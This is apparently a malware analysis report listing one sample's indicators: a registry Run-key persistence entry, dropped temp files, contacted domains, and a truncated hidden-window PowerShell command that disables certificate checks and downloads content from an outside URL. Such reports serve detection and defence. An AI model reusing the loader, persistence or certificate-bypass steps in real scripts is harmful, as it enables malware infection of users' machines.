Technical information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'value' = '%TEMP%\tmp2650.vbe'
- https://picua.org/images/2020/03/22/6287d7edeec6f3e5585ed91289138bec.png
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\4.tmp
- %TEMP%\$inst\5.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\tmp3412.exe
- %TEMP%\tmp2650.vbe
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\4.tmp
- %TEMP%\$inst\5.tmp
- 'pi##a.org':443
- 'ip###ger.org':443
- DNS ASK google.com
- DNS ASK pi##a.org
- DNS ASK ip###ger.org
- '%TEMP%\tmp3412.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\tmp2650.vbe"
- '%WINDIR%\syswow64\ping.exe' google.com' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$kzMADfdbzyK='%TEMP%\tmp2650.vbe';$CVfZsD=(New-Object Net.WebClient).DownloadString('https://picua.org/images/2020/03/22/6...' (with hidden window)
- '%WINDIR%\syswow64\ping.exe' google.com
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'